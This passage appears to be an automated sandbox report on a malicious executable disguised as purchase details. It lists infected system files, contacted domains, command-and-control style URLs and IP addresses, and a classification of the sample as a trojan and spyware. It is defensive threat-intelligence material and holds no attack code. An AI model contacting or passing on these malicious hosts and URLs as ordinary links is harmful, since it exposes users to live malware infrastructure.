                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | 100% | Joe Sandbox ML | -
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML | -
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  przvgke.biz | 172.234.222.143 | true | false | - | high
                  76899.bodis.com | 199.59.243.227 | true | false | - | high
                  ssbzmoy.biz | 18.141.10.107 | true | false | - | high
                  knjghuig.biz | 18.141.10.107 | true | false | - | high
                  vjaxhpbji.biz | 82.112.184.197 | true | false | - | high
                  pywolwnvd.biz | 54.244.188.177 | true | false | - | high
                  reallyfreegeoip.org | 104.21.67.152 | true | false | - | high
                  webmail.thematman.com.au | 103.20.200.105 | true | false | - | unknown
                  checkip.dyndns.com | 158.101.44.242 | true | false | - | high
                  cvgrf.biz | 54.244.188.177 | true | false | - | high
                  ww99.przvgke.biz | 72.52.179.174 | true | false | - | unknown
                  lpuegx.biz | 82.112.184.197 | true | false | - | high
                  084725.parkingcrew.net | 13.248.148.254 | true | false | - | high
                  npukfztj.biz | 44.221.84.105 | true | false | - | high
                  lwaziacademy.com | 41.185.8.252 | true | true | - | unknown
                  ww7.przvgke.biz | unknown | unknown | true | - | unknown
                  zlenh.biz | unknown | unknown | false | - | high
                  checkip.dyndns.org | unknown | unknown | false | - | high
                  uhxqin.biz | unknown | unknown | false | - | high
                  ww12.przvgke.biz | unknown | unknown | true | - | unknown
                  anpmnmxo.biz | unknown | unknown | false | - | high
                  Name | Malicious | Antivirus Detection | Reputation
                  http://cvgrf.biz/fapn | true | - | -
                  http://przvgke.biz/bjede | false | - | -
                  https://lwaziacademy.com/royal/233_Sdvvfamydeo | true | - | -
                  http://vjaxhpbji.biz/goescaydbiatn | true | - | -
                  http://przvgke.biz/fauopp | false | - | -
                  http://lpuegx.biz/pfoxkxwneqnmhcsc | true | - | -
                  http://ssbzmoy.biz/fupmvmgjbhmts | false | - | -
                  http://ssbzmoy.biz/jae | false | - | -
                  http://przvgke.biz/cairvr | false | - | -
                  http://checkip.dyndns.org/ | false | - | -
                  http://pywolwnvd.biz/nimjw | true | - | -
                  http://npukfztj.biz/cbecuogqej | false | - | -
                  http://vjaxhpbji.biz/ewvwgr | true | - | -
                  http://cvgrf.biz/npdqgsoqmq | true | - | -
                  http://lpuegx.biz/bwbcqohd | true | - | -
                  http://lpuegx.biz/tjgeolaydho | true | - | -
                  https://reallyfreegeoip.org/xml/8.46.123.228 | false | - | -
                  http://vjaxhpbji.biz/eooel | true | - | -
                  http://vjaxhpbji.biz/ovwmjligotchf | true | - | -
                  http://knjghuig.biz/uoxisrajk | false | - | -
                  http://lpuegx.biz/ahrvaxreoca | true | - | -
                  http://knjghuig.biz/jedofahyn | false | - | -
                  http://pywolwnvd.biz/kka | true | - | -
                  http://przvgke.biz/obujsmdylt | false | - | -
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://82.112.184.197:80/ewvwgrydho; | alg.exe, 0000000C.00000002.2678337066.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2504408832.000000000058A000.00000004.00000020.00020000.00000000.sdmp | false | - | -
                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | false | - | -
                  http://ocsp.sectigo.com0 | PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | false | - | -
                  http://82.112.184.197:80/pfoxkxwneqnmhcscM | alg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmp | false | - | -
                  http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | false | - | -
                  http://ww99.przvgke.biz/bjede | alg.exe, 0000000C.00000003.2279374376.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1825992446.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.000000000056F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800587225.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2503862949.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2281474066.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1804005716.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1783776008.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1830975438.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2504629883.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052183315.00000000005AB000.00000004.00000020.00020000.00000000.sdmp | false | - | -
                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | false | - | -
                  https://lwaziacademy.com/royal/233_Sdvvfamydeo~ | PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007CB000.00000004.00000020.00020000.00000000.sdmp | false | - | -
                  http://ww12.przvgke.biz/bjede?usid=18&utid=28672493896 | alg.exe, 0000000C.00000003.1830975438.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052183315.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1784696793.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800587225.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1825992446.00000000005BE000.00000004.00000020.00020000.00000000.sdmp | false | - | -
                  http://ww12.przvgke.biz:80/fauopp?usid=18&utid=28672494417 | alg.exe, 0000000C.00000003.1800721272.000000000058A000.00000004.00000020.00020000.00000000.sdmp | false | - | -
                  http://82.112.184.197/ewvwgr | alg.exe, 0000000C.00000003.2503862949.00000000005B4000.00000004.00000020.00020000.00000000.sdmp | false | - | -
                  http://18.141.10.107/jedofahynK | alg.exe, 0000000C.00000003.1825992446.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1830975438.00000000005A8000.00000004.00000020.00020000.00000000.sdmp | false | - | -
                  http://18.141.10.107/jedofahyn | alg.exe, 0000000C.00000003.1825992446.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1826309227.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1830975438.00000000005A8000.00000004.00000020.00020000.00000000.sdmp | false | - | -
                  https://www.google.com | ymafvvdS.pif, 00000009.00000003.1780195449.000000002AE10000.00000004.00000020.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1780016826.000000002A730000.00000004.00001000.00020000.00000000.sdmp | false | - | -
                  http://ww12.przvgke.biz:80/bjede?usid=18&utid=28672493896 | alg.exe, 0000000C.00000003.1784206549.0000000000589000.00000004.00000020.00020000.00000000.sdmp | false | - | -
                                                                                                                                          http://ww99.przvgke.biz:80/bjedealg.exe, 0000000C.00000003.1784206549.0000000000589000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzU3ZGE0MWNmalg.exe, 0000000C.00000003.1785018186.0000000001700000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              https://lwaziacademy.com/PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007A1000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                http://ww99.przvgke.biz:80/fauoppalg.exe, 0000000C.00000003.1826309227.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800721272.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  http://54.244.188.177/npdqgsoqmqYalg.exe, 0000000C.00000003.1685939273.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    http://54.244.188.177/alg.exe, 0000000C.00000003.1644704325.000000000056F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      https://lwaziacademy.com:443/royal/233_SdvvfamydeoPURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        http://18.141.10.107:80/jedofahynusid=18&utid=28672494417alg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052928274.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1826309227.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            http://82.112.184.197/tjgeolaydhoKalg.exe, 0000000C.00000003.2053936887.00000000005B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              http://172.234.222.143:80/fauoppalg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052928274.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1826309227.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800721272.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://sectigo.com/CPS0PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://82.112.184.197/ewvwgrngsalg.exe, 0000000C.00000003.2503862949.00000000005B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://lwaziacademy.com/royal/2PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.0000000020A7D000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                                                                                                      http://82.112.184.197/tjgeolaydhoalg.exe, 0000000C.00000003.2053936887.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.0000000000518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        http://82.112.184.197/eooelalg.exe, 0000000C.00000002.2678337066.000000000056F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.00000000005B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          http://rbg.nPURCHASE REQUIRED DETAILS 000487958790903403.exefalse
                                                                                                                                                                            http://82.112.184.197:80/tjgeolaydho;alg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052928274.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              http://54.244.188.177/kkaalg.exe, 0000000C.00000003.1644704325.000000000056F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1644501807.000000000058C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                http://82.112.184.197/eooelngsalg.exe, 0000000C.00000002.2678337066.00000000005B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  http://54.244.188.177:80/npdqgsoqmqalg.exe, 0000000C.00000003.1700499143.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1685939273.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://pcnatrk.net/track.alg.exe, 0000000C.00000003.1801065112.0000000001760000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1785018186.0000000001700000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      http://18.141.10.107:80/fupmvmgjbhmtsalg.exe, 0000000C.00000003.1700499143.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1668813012.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1685939273.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://lwaziacademy.com/royal/233_SdvvfamydeoM6PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzU3ZGE0M2E5alg.exe, 0000000C.00000003.1801065112.0000000001760000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            http://172.234.222.143:80/bjedealg.exe, 0000000C.00000003.1784206549.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800721272.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              http://44.221.84.105:80/cbecuogqejalg.exe, 0000000C.00000003.1700499143.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1784206549.0000000000589000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                http://82.112.184.197/pfoxkxwneqnmhcscalg.exe, 0000000C.00000003.2279374376.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2280831077.00000000005B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  http://82.112.184.197:80/eooelppalg.exe, 0000000C.00000002.2678337066.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    http://ww99.przvgke.biz/bjedeTalg.exe, 0000000C.00000002.2678337066.000000000056F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      http://www.winimage.com/zLibDllSingleClientServicesUpdater.exe.9.drfalse
                                                                                                                                                                                                        http://82.112.184.197/ewvwgroUalg.exe, 0000000C.00000003.2503862949.00000000005B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          http://ww12.przvgke.biz/fauopp?usid=18&utid=28672494417alg.exe, 0000000C.00000002.2678337066.0000000000518000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800587225.00000000005BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            http://www.pmail.comPURCHASE REQUIRED DETAILS 000487958790903403.exe, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1571228970.0000000021D3D000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209C2000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429814207.0000000002597000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1585083858.0000000002596000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1642838997.000000007FB6F000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1634935767.0000000022065000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1571228970.0000000021CDF000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209E5000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000000.1571834546.0000000000416000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                              http://ww12.przvgke.biz/alg.exe, 0000000C.00000002.2678337066.0000000000518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                http://ocsp.sectigo.com0CPURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  http://ww99.przvgke.biz/fauoppalg.exe, 0000000C.00000003.1800587225.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2503862949.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2281474066.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1804005716.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800849962.00000000005B3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1830975438.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2504629883.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052183315.00000000005AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.bizalg.exe, 0000000C.00000003.1801065112.0000000001760000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800351712.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1783458530.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1785018186.0000000001700000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      http://82.112.184.197/alg.exe, 0000000C.00000002.2678337066.000000000056F000.00000004.00000020.00020000.00000000.sdmpfalse
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
13.248.148.254 | 084725.parkingcrew.net | United States | 16509 | AMAZON-02US | false
172.234.222.143 | przvgke.biz | United States | 20940 | AKAMAI-ASN1EU | false
72.52.179.174 | ww99.przvgke.biz | United States | 32244 | LIQUIDWEBUS | false
199.59.243.227 | 76899.bodis.com | United States | 395082 | BODIS-NJUS | false
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
41.185.8.252 | lwaziacademy.com | South Africa | 36943 | GridhostZA | true
104.21.67.152 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
44.221.84.105 | npukfztj.biz | United States | 14618 | AMAZON-AESUS | false
54.244.188.177 | pywolwnvd.biz | United States | 16509 | AMAZON-02US | false
103.20.200.105 | webmail.thematman.com.au | Australia | 38719 | DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | false
82.112.184.197 | vjaxhpbji.biz | Russian Federation | 43267 | FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU | false
18.141.10.107 | ssbzmoy.biz | United States | 16509 | AMAZON-02US | false
IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572131
Start date and time: 2024-12-10 07:04:15 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 35s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 40
Number of new started drivers analysed: 3
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                        Sample name:PURCHASE REQUIRED DETAILS 000487958790903403.exe
                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                        Classification:mal100.spre.troj.spyw.expl.evad.winEXE@45/171@31/13
                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                        • Successful, ratio: 85%
                                                                                                                                                                                                                        • Number of executed functions: 89
                                                                                                                                                                                                                        • Number of non-executed functions: 194
                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, SIHClient.exe, VSSVC.exe, svchost.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 20.109.210.53
                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
